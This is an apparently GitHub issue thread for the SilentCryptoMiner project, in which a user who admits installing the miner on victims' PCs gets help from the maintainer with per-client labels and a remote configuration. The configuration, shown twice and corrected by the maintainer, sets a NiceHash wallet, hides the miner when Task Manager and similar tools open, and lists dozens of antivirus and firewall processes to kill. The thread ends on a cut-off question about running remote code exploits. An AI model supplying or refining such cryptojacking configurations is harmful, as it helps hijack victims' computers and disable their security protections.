### ISSUE TITLE
adding custom lable for miners

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#2031]
Hi Bro G.mrg

i want to know how to assing particuler miner lable
(i have 03 client so i don't know who installed the miner to victem pc)
can i have chances to set custom lable  ?

(i know previously you discussed with someone about this metter in discussing section you sayed use advance parameter section at build time but i can't find the disscuessed convertation)

pls tell me how extractly do that ?

Thank's Bro Have a Nice day!

**Comment by DARK-DEVIL-66** [comment]
and whare it's appeared "customed lable"

**Comment by UnamSanctam** [comment]
You can set a custom version for your miner by adding `--cinit-version` into the "Advanced Parameters", so for example: if you add `--cinit-version="3.4.0 CUSTOM"` into your "Advanced Parameters" then in your web panel under the "Version" field it will say 3.4.0 CUSTOM instead of 3.4.0.

**Comment by DARK-DEVIL-66** [comment]
1.It"s correct
--cinit-version="3.4.0 CLIENT1"

or

2.we can only audjest number like that...

--cinit-version="3.8.0 CUSTOM"


wich is correct 1 or 2

**Comment by UnamSanctam** [comment]
You can change it to anything you want.

**Comment by UnamSanctam** [comment]
That's wrong, that's the format for the GPU miner. The GPU miner uses the "url" format while the CPU miner uses the "pool", "port" and "wallet" format.
https://github.com/UnamSanctam/SilentCryptoMiner/wiki/CPU-Miner#remote-configuration
https://github.com/UnamSanctam/SilentCryptoMiner/wiki/GPU-Miner#remote-configuration

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/95da9a6d-3a71-4094-814b-4b14a8a48373)


but they showed stratums

**Comment by DARK-DEVIL-66** [comment]
{
	"algo": "rx/0",
	"pool": "randomxmonero.auto.nicehash.com:443",
	"port": 12222,
	"wallet": "NHbD1ChWnhQK3MXA6iDrZ43jerajAegwNRhB.{COMPUTERNAME}",
	"password": "x",
	"nicehash": true,
	"ssltls": true,
	"max-cpu": 20,
	"idle-wait": 5,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",
	"stealth-fullscreen": false
}


this one is correct ?

**Comment by UnamSanctam** [comment]
>but they showed stratums

Yes, though CPU miners usually don't use that format.

>this one is correct ?

Almost, it should be:
```
{
"algo": "rx/0",
"pool": "randomxmonero.auto.nicehash.com",
"port": 443,
"wallet": "NHbD1ChWnhQK3MXA6iDrZ43jerajAegwNRhB.{COMPUTERNAME}",
"password": "x",
"nicehash": true,
"ssltls": true,
"max-cpu": 20,
"idle-wait": 5,
"idle-cpu": 80,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",
"stealth-fullscreen": false
}
```

**Comment by DARK-DEVIL-66** [comment]
can i use ghost rider algo in nicehash

**Comment by UnamSanctam** [comment]
No they don't have GhostRider, you can see all the algorithms they buy/sell hashrate for here: https://www.nicehash.com/algorithm

**Comment by DARK-DEVIL-66** [comment]
wich algo is low end cpu using like ghost rider       
in nice hash ?

**Comment by DARK-DEVIL-66** [comment]
is nicehash is profitable compiring with pool mining ?

**Comment by DARK-DEVIL-66** [comment]
can i execute remote code explotes like 'online payload'  through
